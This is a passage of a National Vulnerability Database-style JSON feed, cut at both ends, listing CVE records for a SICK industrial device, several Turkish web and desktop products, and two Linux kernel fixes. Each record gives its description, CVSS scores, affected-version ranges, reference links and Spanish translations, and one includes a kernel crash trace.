ator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3273","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.560","lastModified":"2026-06-01T13:16:24.710","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in the SICK ICR890-4 could allow an unauthenticated remote attacker to affect the availability of the device by changing settings of the device such as the IP\naddress based on missing access 
control."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor 
Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2024-12970","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-01-06T12:15:06.573","lastModified":"2026-06-01T13:16:25.710","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in TUBITAK BILGEM Pardus OS My Computer allows OS Command Injection.\n\nThis issue affects Pardus OS My Computer: before 0.7.2."},{"lang":"es","value":"Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo ('Inyección de comando del sistema operativo') en TUBITAK BILGEM Pardus OS My Computer permite la inyección de comandos del sistema operativo. 
Este problema afecta a Pardus OS My Computer: antes de 0.7.2."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L","baseScore":3.9,"baseSeverity":"LOW","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":0.5,"impactScore":3.4}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-78"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-24-1900","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-24-1900","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13152","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-14T13:15:42.170","lastModified":"2026-06-01T13:16:27.967","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BSS Software Mobuy Online Machinery Monitoring Panel allows SQL Injection.\n\nThis issue affects Mobuy Online Machinery Monitoring Panel: before 2.0."},{"lang":"es","value":"La vulnerabilidad de omisión de autorización a través de la clave principal SQL controlada por el usuario en BSS Software Mobuy Online Machinery Monitoring Panel permite la inyección SQL. 
Este problema afecta a Mobuy Online Machinery Monitoring Panel: antes de 2.0."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","baseScore":10.0,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":6.0}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0033","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0033","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12917","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-24T15:15:12.383","lastModified":"2026-06-01T13:16:25.190","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties vulnerability in Agito Computer Health4All allows Exploiting Incorrectly Configured Access Control Security Levels, Authentication Abuse.\n\nThis issue affects Health4All: before 10.01.2025."},{"lang":"es","value":" La vulnerabilidad de archivos o directorios accesibles a partes externas en Agito Computer Health4All permite explotar niveles de seguridad de control de acceso configurados incorrectamente y abuso de autenticación. 
Este problema afecta a Health4All: antes del 10.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","baseScore":8.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":5.5}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-552"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0042","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0042","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-12918","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-24T15:15:12.537","lastModified":"2026-06-01T13:16:25.320","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agito Computer Health4All allows SQL Injection.\n\nThis issue affects Health4All: before 10.01.2025."},{"lang":"es","value":" Vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Agito Computer Health4All permite la inyección SQL. 
Este problema afecta a Health4All: antes del 10.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0042","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0042","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13148","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-02-27T15:15:38.583","lastModified":"2026-06-01T13:16:27.500","vulnStatus":"Deferred","cveTags":[{"sourceIdentifier":"iletisim@usom.gov.tr","tags":["exclusively-hosted-service"]}],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yukseloglu Filter B2B Login Platform allows SQL Injection.\n\nThis issue affects B2B Login Platform: before 16.01.2025."},{"lang":"es","value":"La vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Yukseloglu Filter B2B Login Platform permite la inyección SQL. 
Este problema afecta a B2B Login Platform: antes del 16.01.2025."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0045","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0045","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13147","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-03-05T14:15:35.910","lastModified":"2026-06-01T13:16:27.377","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Merkur Software B2B Login Panel allows SQL Injection.\n\nThis issue affects B2B Login Panel: before 15.01.2025."},{"lang":"es","value":"La vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') en Merkur Software B2B Login Panel permite la inyección SQL. Este problema afecta al Panel de inicio de sesión B2B: antes del 15.01.2025. 
"}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0054","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0054","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2024-13175","sourceIdentifier":"iletisim@usom.gov.tr","published":"2025-07-18T14:15:23.377","lastModified":"2026-06-01T13:16:28.180","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Vidco Software VOC TESTER allows Forceful Browsing.\n\nThis issue affects VOC TESTER: before 12.41.0."},{"lang":"es","value":"La vulnerabilidad de omisión de autorización a través de una clave controlada por el usuario en Vidco Software VOC TESTER permite la navegación forzada. 
Este problema afecta a VOC TESTER: antes de 12.41.0."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0159","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-25-0159","source":"iletisim@usom.gov.tr"}]}},{"cve":{"id":"CVE-2025-38500","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-08-12T16:15:27.277","lastModified":"2026-06-01T12:26:08.800","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: interface: fix use-after-free after changing collect_md xfrm interface\n\ncollect_md property on xfrm interfaces can only be set on device creation,\nthus xfrmi_changelink() should fail when called on such interfaces.\n\nThe check to enforce this was done only in the case where the xi was\nreturned from xfrmi_locate() which doesn't look for the collect_md\ninterface, and thus the validation was never reached.\n\nCalling changelink would thus errornously place the special interface xi\nin the xfrmi_net->xfrmi hash, but since it also exists in the\nxfrmi_net->collect_md_xfrmi pointer it would lead to a double free when\nthe net namespace was taken down [1].\n\nChange the check to use the xi from netdev_priv which is available earlier\nin the function to prevent changes in xfrm collect_md interfaces.\n\n[1] resulting 
oops:\n[    8.516540] kernel BUG at net/core/dev.c:12029!\n[    8.516552] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[    8.516559] CPU: 0 UID: 0 PID: 12 Comm: kworker/u80:0 Not tainted 6.15.0-virtme #5 PREEMPT(voluntary)\n[    8.516565] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[    8.516569] Workqueue: netns cleanup_net\n[    8.516579] RIP: 0010:unregister_netdevice_many_notify+0x101/0xab0\n[    8.516590] Code: 90 0f 0b 90 48 8b b0 78 01 00 00 48 8b 90 80 01 00 00 48 89 56 08 48 89 32 4c 89 80 78 01 00 00 48 89 b8 80 01 00 00 eb ac 90 <0f> 0b 48 8b 45 00 4c 8d a0 88 fe ff ff 48 39 c5 74 5c 41 80 bc 24\n[    8.516593] RSP: 0018:ffffa93b8006bd30 EFLAGS: 00010206\n[    8.516598] RAX: ffff98fe4226e000 RBX: ffffa93b8006bd58 RCX: ffffa93b8006bc60\n[    8.516601] RDX: 0000000000000004 RSI: 0000000000000000 RDI: dead000000000122\n[    8.516603] RBP: ffffa93b8006bdd8 R08: dead000000000100 R09: ffff98fe4133c100\n[    8.516605] R10: 0000000000000000 R11: 00000000000003d2 R12: ffffa93b8006be00\n[    8.516608] R13: ffffffff96c1a510 R14: ffffffff96c1a510 R15: ffffa93b8006be00\n[    8.516615] FS:  0000000000000000(0000) GS:ffff98fee73b7000(0000) knlGS:0000000000000000\n[    8.516619] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[    8.516622] CR2: 00007fcd2abd0700 CR3: 000000003aa40000 CR4: 0000000000752ef0\n[    8.516625] PKRU: 55555554\n[    8.516627] Call Trace:\n[    8.516632]  <TASK>\n[    8.516635]  ? rtnl_is_locked+0x15/0x20\n[    8.516641]  ? unregister_netdevice_queue+0x29/0xf0\n[    8.516650]  ops_undo_list+0x1f2/0x220\n[    8.516659]  cleanup_net+0x1ad/0x2e0\n[    8.516664]  process_one_work+0x160/0x380\n[    8.516673]  worker_thread+0x2aa/0x3c0\n[    8.516679]  ? __pfx_worker_thread+0x10/0x10\n[    8.516686]  kthread+0xfb/0x200\n[    8.516690]  ? __pfx_kthread+0x10/0x10\n[    8.516693]  ? __pfx_kthread+0x10/0x10\n[    8.516697]  ret_from_fork+0x82/0xf0\n[    8.516705]  ? 
__pfx_kthread+0x10/0x10\n[    8.516709]  ret_from_fork_asm+0x1a/0x30\n[    8.516718]  </TASK>"},{"lang":"es","value":"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: xfrm: interfaz: se corrige el Use After Free después de cambiar la propiedad collect_md de la interfaz xfrm. Las interfaces xfrm solo se pueden configurar al crear el dispositivo, por lo que xfrmi_changelink() debería fallar al llamarse en dichas interfaces. La comprobación para aplicar esto solo se realizó en el caso en que xi se devolviera desde xfrmi_locate(), que no busca la interfaz collect_md y, por lo tanto, nunca se alcanzó la validación. Llamar a changelink colocaría por error la interfaz especial xi en el hash xfrmi_net-&gt;xfrmi, pero como también existe en el puntero xfrmi_net-&gt;collect_md_xfrmi, provocaría una doble liberación cuando se eliminara el espacio de nombres net [1]. Cambie la comprobación para usar xi de netdev_priv, que está disponible anteriormente en la función, para evitar cambios en las interfaces xfrm collect_md. [1] resulting oops: [ 8.516540] kernel BUG at net/core/dev.c:12029! 
[ 8.516552] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 8.516559] CPU: 0 UID: 0 PID: 12 Comm: kworker/u80:0 Not tainted 6.15.0-virtme #5 PREEMPT(voluntary) [ 8.516565] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 8.516569] Workqueue: netns cleanup_net [ 8.516579] RIP: 0010:unregister_netdevice_many_notify+0x101/0xab0 [ 8.516590] Code: 90 0f 0b 90 48 8b b0 78 01 00 00 48 8b 90 80 01 00 00 48 89 56 08 48 89 32 4c 89 80 78 01 00 00 48 89 b8 80 01 00 00 eb ac 90 &lt;0f&gt; 0b 48 8b 45 00 4c 8d a0 88 fe ff ff 48 39 c5 74 5c 41 80 bc 24 [ 8.516593] RSP: 0018:ffffa93b8006bd30 EFLAGS: 00010206 [ 8.516598] RAX: ffff98fe4226e000 RBX: ffffa93b8006bd58 RCX: ffffa93b8006bc60 [ 8.516601] RDX: 0000000000000004 RSI: 0000000000000000 RDI: dead000000000122 [ 8.516603] RBP: ffffa93b8006bdd8 R08: dead000000000100 R09: ffff98fe4133c100 [ 8.516605] R10: 0000000000000000 R11: 00000000000003d2 R12: ffffa93b8006be00 [ 8.516608] R13: ffffffff96c1a510 R14: ffffffff96c1a510 R15: ffffa93b8006be00 [ 8.516615] FS: 0000000000000000(0000) GS:ffff98fee73b7000(0000) knlGS:0000000000000000 [ 8.516619] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 8.516622] CR2: 00007fcd2abd0700 CR3: 000000003aa40000 CR4: 0000000000752ef0 [ 8.516625] PKRU: 55555554 [ 8.516627] Call Trace: [ 8.516632]  [ 8.516635] ? rtnl_is_locked+0x15/0x20 [ 8.516641] ? unregister_netdevice_queue+0x29/0xf0 [ 8.516650] ops_undo_list+0x1f2/0x220 [ 8.516659] cleanup_net+0x1ad/0x2e0 [ 8.516664] process_one_work+0x160/0x380 [ 8.516673] worker_thread+0x2aa/0x3c0 [ 8.516679] ? __pfx_worker_thread+0x10/0x10 [ 8.516686] kthread+0xfb/0x200 [ 8.516690] ? __pfx_kthread+0x10/0x10 [ 8.516693] ? __pfx_kthread+0x10/0x10 [ 8.516697] ret_from_fork+0x82/0xf0 [ 8.516705] ? 
__pfx_kthread+0x10/0x10 [ 8.516709] ret_from_fork_asm+0x1a/0x30 [ 8.516718] "}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.8,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":5.9}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-416"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-416"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.1","versionEndExcluding":"6.1.148","matchCriteriaId":"6DF6D064-B873-476E-945E-6A819B5BDED9"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.2","versionEndExcluding":"6.6.101","matchCriteriaId":"686C7A1C-35F3-495D-9825-94B5BCED2705"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.7","versionEndExcluding":"6.12.41","matchCriteriaId":"7B9B92B6-A7E5-4697-AB94-8432ED55AA05"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"6.13","versionEndExcluding":"6.15.9"
,"matchCriteriaId":"656D6B8C-4D7B-4385-98B6-44EA4AFADD2E"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc1:*:*:*:*:*:*","matchCriteriaId":"6D4894DB-CCFE-4602-B1BF-3960B2E19A01"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc2:*:*:*:*:*:*","matchCriteriaId":"09709862-E348-4378-8632-5A7813EDDC86"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc3:*:*:*:*:*:*","matchCriteriaId":"415BF58A-8197-43F5-B3D7-D1D63057A26E"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc4:*:*:*:*:*:*","matchCriteriaId":"A0517869-312D-4429-80C2-561086E1421C"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc5:*:*:*:*:*:*","matchCriteriaId":"85421F4E-C863-4ABF-B4B4-E887CC2F7F92"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc6:*:*:*:*:*:*","matchCriteriaId":"3827F0D4-5FEE-4181-B267-5A45E7CA11FC"},{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:6.16:rc7:*:*:*:*:*:*","matchCriteriaId":"7A9C2DE5-43B8-4D73-BDB5-EA55C7671A52"}]}]},{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*","matchCriteriaId":"FA6FEEC2-9F11-4643-8827-749718254FED"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/5918c3f4800a3aef2173865e5903370f21e24f47","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/69a31f7a6a81f5ffd3812c442e09ff0be22960f1","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/a8d4748b954584ab7bd800f1a4e46d5b0eeb5ce4","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/a90b2a1aaacbcf0f91d7e4868ad6c51c5dee814b","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/bfebdb85496e1da21d3cf05de099210915c3e706","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url
":"https://lists.debian.org/debian-lts-announce/2025/10/msg00008.html","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2025-38502","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-08-16T10:15:25.653","lastModified":"2026-06-01T12:24:50.730","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix oob access in cgroup local storage\n\nLonial reported that an out-of-bounds access in cgroup local storage\ncan be crafted via tail calls. Given two programs each utilizing a\ncgroup local storage with a different value size, and one program\ndoing a tail call into the other. The verifier will validate each of\nthe indivial programs just fine. However, in the runtime context\nthe bpf_cg_run_ctx holds an bpf_prog_array_item which contains the\nBPF program as well as any cgroup local storage flavor the program\nuses. Helpers such as bpf_get_local_storage() pick this up from the\nruntime context:\n\n  ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx);\n  storage = ctx->prog_item->cgroup_storage[stype];\n\n  if (stype == BPF_CGROUP_STORAGE_SHARED)\n    ptr = &READ_ONCE(storage->buf)->data[0];\n  else\n    ptr = this_cpu_ptr(storage->percpu_buf);\n\nFor the second program which was called from the originally attached\none, this means bpf_get_local_storage() will pick up the former\nprogram's map, not its own. 
With mismatching sizes, this can result\nin an unintended out-of-bounds access.\n\nTo fix this issue, we need to extend bpf_map_owner with an array of\nstorage_cookie[] to match on i) the exact maps from the original\nprogram if the second program was using bpf_get_local_storage(), or\nii) allow the tail call combination if the second program was not\nusing any of the cgroup local storage maps."},{"lang":"es","value":"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: bpf: Corrección del acceso fuera de los límites en el almacenamiento local de cgroup Lonial informó que se puede manipular un acceso fuera de los límites en el almacenamiento local de cgroup mediante llamadas de cola. Dados dos programas, cada uno utilizando un almacenamiento local de cgroup con un tamaño de valor diferente, y un programa realizando una llamada de cola en el otro. El verificador validará cada uno de los programas individuales sin problemas. Sin embargo, en el contexto de tiempo de ejecución, bpf_cg_run_ctx contiene un bpf_prog_array_item que contiene el programa BPF, así como cualquier sabor de almacenamiento local de cgroup que use el programa. Los ayudantes como bpf_get_local_storage() recogen esto del contexto de tiempo de ejecución: ctx = container_of(current-&gt;bpf_ctx, struct bpf_cg_run_ctx, run_ctx); storage = ctx-&gt;prog_item-&gt;cgroup_storage[stype]; if (stype == BPF_CGROUP_STORAGE_SHARED) ptr = &amp;READ_ONCE(storage-&gt;buf)-&gt;data[0]; else ptr = this_cpu_ptr(storage-&gt;percpu_buf); Para el segundo programa llamado desde el programa adjunto original, esto significa que bpf_get_local_storage() tomará el mapa del programa anterior, no el suyo. Con tamaños no coincidentes, esto puede resultar en un acceso fuera de los límites no deseado. 
